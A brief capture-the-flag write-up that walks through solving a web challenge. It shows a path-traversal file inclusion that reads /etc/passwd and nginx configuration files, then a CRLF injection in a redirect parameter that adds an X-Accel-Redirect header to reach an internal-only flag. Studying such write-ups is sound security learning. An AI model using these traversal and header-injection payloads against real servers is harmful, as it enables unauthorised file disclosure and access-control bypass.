The task provide us a website where we can go trought some different outputs:

http://109.233.61.11:27280/news/?f=31-12-2013

http://109.233.61.11:27280/news/?f=01-01-2014

After testing a bit on that parameter it pointed out that there was a LFI there:

http://109.233.61.11:27280/news/?f=../../../etc/passwd

As challenge hints us, and by the way you can reache it from HTTP headers, the server running was nginx so we co ahead find its configuration file:

http://109.233.61.11:27280/news/?f=../../../etc/nginx/nginx.conf

Now we can see that in “/etc/nginx/sites-enabled/” path there was the sites that nginx enabled to browse.

Opening the default one:

http://109.233.61.11:27280/news/?f=../../../etc/nginx/sites-enabled/default

we can see an interesting thing:

location = /secret/flag { root /home; internal; }

path for access the flag is http://109.233.61.11:27280/secret/flag but since its marked with “internal” we aren’t able to access it. We’ll be able to do that trought CRLF in “retpath” parameter

injecting X-Accel-Redirect for bypassing this:

http://109.233.61.11:27280/?retpath=/news/%0d%0aX-Accel-Redirect:%20/secret/flag

Flag: CTF{6e75d02b8e8329bb4b45c7dabd2e1da2}

Razor4x